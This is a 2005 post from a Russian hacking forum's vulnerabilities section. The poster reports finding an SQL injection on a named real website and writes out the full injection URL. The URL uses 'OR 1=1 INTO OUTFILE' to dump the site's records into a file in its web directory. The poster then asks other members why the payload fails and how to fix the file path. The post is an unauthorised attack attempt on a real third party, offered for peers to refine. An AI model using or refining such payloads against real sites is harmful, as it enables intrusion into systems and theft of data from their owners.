Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   intline.ru+sql-inj (https://forum.antichat.xyz/showthread.php?t=11784)

fucker"ok 15.12.2005 17:45
intline.ru+sql-inj
 
Ответ на тему http://forum.antichat.ru/thread11462.html


http://www.intline.ru/inside/001.php?idvalue='

никогда серьёзно не занимался sql-inj (но знал теоритически как это работает), но прочитал тот топик, зашёл на сайт и сразу наткнулся на inj :)
Вот тут самому стало интересно, хочу попробовать вывести все новости в файл /home/intline/WWW/lol.txt
Вот сам иньектор, который хочу присоединить
Код:
...OR 1=1 INTO OUTFILE '/home/intline/WWW/lol.txt' /*
http://www.intline.ru/inside/001.php?idvalue=0%20OR%201=1%20INTO%20OUTFILE%20'/home/intline/WWW/lol.txt'/*

Но файл не создаётся, да и ошибка (думаю запрос не верный). :(
ПУть к файлу для OUTFILE надо задавать относительно коталога с БД mysql?
Тоесть ../../../home/WWW/ и тд
Есть идеи почему запрос "кривит"?


Время: 16:36